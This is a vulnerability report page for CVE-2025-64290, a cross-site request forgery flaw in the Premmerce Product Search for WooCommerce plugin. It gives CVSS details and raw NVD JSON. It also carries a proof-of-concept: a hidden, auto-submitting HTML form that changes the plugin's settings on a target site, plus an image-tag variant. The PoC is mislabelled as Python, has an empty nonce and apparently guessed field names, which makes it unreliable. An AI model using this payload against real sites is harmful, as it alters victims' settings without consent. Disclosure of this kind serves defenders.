Security Vulnerability Report
中文
CVE-2025-64290 CVSS 4.3 MEDIUM

CVE-2025-64290

Published: 2025-10-29 09:15:47
Last Modified: 2026-04-27 16:16:40

Description

Cross-Site Request Forgery (CSRF) vulnerability in Premmerce Premmerce Product Search for WooCommerce premmerce-search allows Cross Site Request Forgery.This issue affects Premmerce Product Search for WooCommerce: from n/a through <= 2.2.4.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Premmerce Product Search for WooCommerce <= 2.2.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-64290 --> <!-- Premmerce Product Search for WooCommerce CSRF Attack --> <!DOCTYPE html> <html> <head> <title>CSRF PoC - Premmerce Product Search</title> </head> <body> <h1>CSRF PoC for CVE-2025-64290</h1> <p>This PoC demonstrates a CSRF vulnerability in Premmerce Product Search for WooCommerce plugin.</p> <!-- Auto-submit form that simulates plugin configuration change --> <form id="csrfForm" action="https://target-site.com/wp-admin/admin-post.php" method="POST" style="display:none;"> <!-- WordPress general settings nonce --> <input type="hidden" name="action" value="update" /> <input type="hidden" name="option_page" value="premmerce_search_options" /> <input type="hidden" name="_wpnonce" value="" /> <!-- Malicious plugin configuration --> <input type="hidden" name="premmerce_search_settings[search_placeholder]" value="Malicious Search Placeholder" /> <input type="hidden" name="premmerce_search_settings[enable_ajax]" value="1" /> <input type="hidden" name="premmerce_search_settings[search_results_page]" value="malicious_page" /> </form> <script> // Auto-submit the form when page loads document.getElementById('csrfForm').submit(); </script> <p>If you see this message, the form has been submitted.</p> <p>Target: Premmerce Product Search for WooCommerce <= 2.2.4</p> </body> </html> <!-- Alternative: Image-based CSRF (no user interaction) --> <!-- <img src="https://target-site.com/wp-admin/admin-post.php?action=update&option_page=premmerce_search_options&premmerce_search_settings[search_placeholder]=HACKED" style="display:none;" /> -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64290", "sourceIdentifier": "[email protected]", "published": "2025-10-29T09:15:46.917", "lastModified": "2026-04-27T16:16:40.300", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Premmerce Premmerce Product Search for WooCommerce premmerce-search allows Cross Site Request Forgery.This issue affects Premmerce Product Search for WooCommerce: from n/a through <= 2.2.4."}, {"lang": "es", "value": "Vulnerabilidad de Cross-Site Request Forgery (CSRF) en Premmerce Premmerce Product Search for WooCommerce premmerce-search permite Cross-Site Request Forgery. Este problema afecta a Premmerce Product Search for WooCommerce: desde n/a hasta menor igual que 2.2.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/premmerce-search/vulnerability/wordpress-premmerce-product-search-for-woocommerce-plugin-2-2-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}